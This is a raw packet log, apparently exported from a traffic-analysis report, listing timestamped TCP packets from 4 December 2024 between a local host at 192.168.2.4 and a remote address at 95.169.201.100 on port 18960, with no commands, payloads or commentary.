                                                                                                                                                      Dec 4, 2024 13:58:08.892200947 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.892390966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.892435074 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.893466949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.893599987 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.893659115 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.894566059 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.894679070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.894737005 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.895518064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.895626068 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.895700932 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.896377087 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.896501064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.896636009 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.897459030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.897655010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.898528099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.898564100 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:08.898664951 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:08.899486065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:10.774210930 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:10.894278049 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.179347038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.179447889 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.179769993 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.179835081 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.180526018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.180603981 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.180644035 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.181535959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.181611061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.181677103 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.182564974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.182607889 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.182734966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.183512926 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.183639050 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.183693886 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.184484959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.187510967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.272388935 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.272402048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.272627115 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.272659063 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.272742033 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.273503065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.273616076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.273735046 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.274378061 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.274646044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.274780035 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.274960041 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.275726080 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.275913954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.275960922 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.276696920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.276807070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.277025938 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.277704000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.277952909 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.278244019 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.279141903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.279258966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.279308081 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.279982090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.280127048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.280865908 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.280919075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.280985117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.281562090 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.282063007 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.282108068 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.282151937 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.282823086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.282928944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.282983065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.364706993 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.364818096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.364898920 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.364907980 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.365041971 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.365092039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.366008997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.366115093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.366164923 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.367096901 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.367228031 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.367278099 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.367986917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.368087053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.369008064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.369061947 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.369180918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.369498014 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.370014906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.370122910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.370170116 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.371006012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.371160030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.371215105 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.373040915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.373060942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.373126984 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.373162985 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.373307943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.373492956 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.374111891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.374209881 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.375128984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.375176907 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.375281096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.375338078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.376176119 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.376255035 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.376580954 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.377204895 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.377285004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.377402067 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.378139019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.378299952 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.378444910 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.379215002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.379343033 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.379803896 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.380295038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.380374908 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.380429029 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.381314993 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.381484032 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.381532907 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.382273912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.382364988 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.382787943 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.383296013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.383383989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.383435011 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.384350061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.384421110 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.384488106 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.385323048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.385433912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.385579109 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.386349916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.386457920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.386499882 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.387382984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.387576103 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.387617111 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.388382912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.455718040 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.457338095 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.457385063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.457442999 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.457719088 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.457881927 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.457926989 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.458777905 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.458966017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.459027052 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.459770918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.459944010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.460009098 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.460822105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.460911989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.461085081 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.461833954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.461905003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.461952925 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.462876081 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.462935925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.462979078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.464001894 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.464106083 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.464168072 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.465188980 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.465270996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.465349913 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.466187954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.466413975 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.466470957 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.467366934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.467508078 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.467570066 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.468044996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.468122959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.468193054 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.468975067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.469172955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.469227076 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.469989061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.470134974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.470206976 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.471014023 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.471249104 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.471304893 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.472104073 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.472193003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.472384930 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.473016024 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.473124981 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.473841906 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.474108934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.474216938 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.474261045 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.475090981 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.475224018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.475373983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.476090908 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.476227999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.476284027 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.477102041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.477205992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.477252007 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.478127956 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.478452921 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.478496075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.479243994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.479367018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.479409933 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.480165958 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.480264902 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.480305910 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.481235981 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.481355906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.481400967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.482213020 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.482397079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.482471943 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.483376026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.483473063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.483511925 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.484376907 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.484513044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.484786034 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.485351086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.485594034 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.485676050 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.486531019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.486605883 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.486644030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.487428904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.487497091 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.487574100 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.557126999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.557343960 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.557398081 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.557598114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.557759047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.557863951 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.557882071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.558859110 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.558896065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.558938026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.559784889 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.559842110 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.559956074 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.560823917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.560878992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.560966015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.561846972 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.561899900 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.561938047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.562855005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.562900066 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.562964916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.563884020 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.563927889 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.563954115 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.564902067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.564943075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.565004110 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.565907955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.565999031 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.566046000 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.566909075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.566946030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.566991091 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.567954063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.568072081 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.568106890 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.568979025 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.569020987 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.569087029 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.570024014 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.570070982 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.570111990 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.571027994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.571069956 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.571129084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.572108984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.572154045 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.572197914 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.573050976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.573116064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.573163986 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.574090004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.574134111 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.574234962 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.575248003 CET189604973295.169.201.100192.168.2.4
